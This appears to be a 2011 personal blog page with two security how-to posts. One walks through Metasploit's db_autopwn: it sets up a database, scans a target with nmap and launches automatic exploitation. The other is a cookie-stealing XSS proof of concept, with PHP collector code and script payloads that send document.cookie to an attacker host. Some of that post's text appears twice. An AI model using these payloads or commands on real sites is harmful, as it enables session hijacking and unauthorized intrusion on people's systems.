Tuesday, May 31, 2011
Wednesday, May 25, 2011
Friday, May 6, 2011
Metasploit db_autopwn (Postgres)
Step 1: Get/view active database driver.
msf exploit(psexec) > db_driver
[*] Active Driver: postgresql
[*] Available: postgresql
[*] DB Support: Enable the mysql driver with the following command:
[*] $ gem install mysql
[*] This gem requires mysqlclient headers, which can be installed on Ubuntu with:
[*] $ sudo apt-get install libmysqlclient-dev
Step 2: Connect to the local database.
msf exploit(psexec) > db_connect postgres@localhost
NOTICE: CREATE TABLE will create implicit sequence "hosts_id_seq" for serial column "hosts.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "hosts_pkey" for table "hosts"
NOTICE: CREATE TABLE will create implicit sequence "clients_id_seq" for serial column "clients.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "clients_pkey" for table "clients"
NOTICE: CREATE TABLE will create implicit sequence "services_id_seq" for serial column "services.id"
...
Step 3: nmap, enumerate the services of target system(s)
msf exploit(psexec) > db_nmap [target]
[*] Nmap: Starting Nmap 5.21 ( http://nmap.org ) at 2011-05-06 15:55 EDT
[*] Nmap: Nmap scan report for [target])
[*] Nmap: Host is up (0.021s latency).
[*] Nmap: Not shown: 995 filtered ports
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 25/tcp open smtp
[*] Nmap: 110/tcp open pop3
[*] Nmap: 143/tcp open imap
[*] Nmap: 443/tcp open https
[*] Nmap: 993/tcp open imaps
Step 4: auto exploit
msf exploit(psexec) > db_autopwn -p -t -e -b
Monday, May 2, 2011
How to steal cookies via XSS
This is a proof of concept demonstrating the the fundamental of stealing cookies via XSS:
There are two parts:
1. The attacker's server that will store the stolen credentials.
2. The vulnerable server that we will be injecting into to steal the session.
Part 1:
This is the code on the server for storing credentials (in PHP). The filename is "malicious.php"
As you can see, all the server code is take in a $_GET request, and writes the attribute 'code' from the $_GET request variable.
Part 2:
In a server that is vulnerable to XSS, input the following malicious code:
The following code creates an image with the source pointing to our malicious server. The request populates the GET variable "code" which the server is expecting to read and write.
There are two parts:
1. The attacker's server that will store the stolen credentials.
2. The vulnerable server that we will be injecting into to steal the session.
Part 1:
This is the code on the server for storing credentials (in PHP). The filename is "malicious.php"
$fp = fopen("/tmp/tokens.txt", "w");
fwrite($fp, $_GET['code']);
fclose($fp);
As you can see, all the server code is take in a $_GET request, and writes the attribute 'code' from the $_GET request variable.
Part 2:
In a server that is vulnerable to XSS, input the following malicious code:
<script>new Image().src='[malicious_host]/malicious.php?code='%2Bdocument.cookie</script>
or
<script>document.write('<img src="http://localhost/~dliu/malicious.php?code='%2Bdocument.cookie%2B'">')</script>
The following code creates an image with the source pointing to our malicious server. The request populates the GET variable "code" which the server is expecting to read and write.
Subscribe to:
Posts (Atom)